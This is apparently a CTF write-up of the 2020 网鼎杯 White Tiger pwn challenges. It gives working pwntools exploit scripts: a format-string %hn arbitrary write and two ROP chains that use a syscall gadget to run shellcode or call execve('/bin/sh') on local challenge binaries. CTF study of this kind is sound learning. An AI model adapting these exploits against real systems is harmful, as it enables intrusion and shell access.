
Reproducing the 网鼎杯 2020 白虎组 (White Tiger division) challenges (pwn part)

网鼎杯 白虎组 was okay: two sign-in challenges, a format string and a stack challenge. The remaining two, a blind pwn and a vivd CVE, I couldn't do.

of

A simple format string, not much to say about it.
exp:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
context.log_level='debug'
p = process('./of')
#p = remote('123.57.225.26',15246)
#elf = ELF('./of')
p.recvuntil('e:')
p.sendline(p32(0x804a028))      # target address, lands on the stack as the 20th format argument
p.recvuntil('e:')
p.sendline('%34714c%20$hn')     # %hn writes the 2-byte value 34714 to that address
p.recvuntil('e:')
p.sendline(p32(0x804a028))      # same address again for the second write
p.recvuntil('e:')
sleep(2)
p.sendline('%35291c%20$hn')     # second 2-byte write, value 35291
p.interactive()

quantum_entanglement

There is a syscall in init, so just use the syscall gadget and you're done.
Two solutions: syscall + shellcode, and syscall + execve.

exp-shellcode:

from pwn import *
context.log_level='debug'
context(arch='amd64',os='linux')
p=process('./shellcode')
rdx_rdi_rsi_syscall=0x400617    # syscall gadget in init; pops rdx, rdi, rsi in that order
bss=0x601200                    # writable, executable-for-this-challenge scratch area
#gdb.attach(p)
#pause()
# 112 bytes of padding, saved rbp, then the chain:
# rdx=0x100, rdi=0, rsi=bss -> read(0, bss, 0x100); afterwards return into bss
payload='a'*112+p64(bss)+p64(rdx_rdi_rsi_syscall)+p64(0x100)+p64(0)+p64(bss)+p64(bss)+p64(bss)
p.sendline(payload)
shellcode=asm(shellcraft.sh())  # second input is read into bss and then executed
p.sendline(shellcode)
p.interactive()

exp-execve:

from pwn import *
context.log_level='debug'
context(arch='amd64',os='linux')
p=process('./shellcode')
main=0x40061f
rdx_rdi_rsi_syscall=0x400617    # syscall gadget in init; pops rdx, rdi, rsi in that order
bss=0x601200
shellcode=asm(shellcraft.sh())  # unused in this variant, kept from the author's script
#gdb.attach(p)
#pause()
# First gadget visit: read(0, bss, 0x100). Second visit: rdx=0, rdi=bss, rsi=0,
# i.e. execve("/bin/sh", 0, 0) provided rax is 59 at that point.
payload='a'*112+p64(bss)+p64(rdx_rdi_rsi_syscall)+p64(0x100)+p64(0)+p64(bss)+p64(bss)+p64(rdx_rdi_rsi_syscall)+p64(0)+p64(bss)+p64(0)
p.sendline(payload)
#pause()
payload='/bin/sh\x00'
# 58 bytes plus the newline from sendline = 59 bytes; read() returns 59 in rax,
# which is the execve syscall number on x86-64
payload=payload.ljust(58,'\x00')
p.sendline(payload)
p.interactive()

vivd

I've downloaded the file; I'll reproduce it when I have time.

So hungry. If I'd known, I wouldn't have gone into security.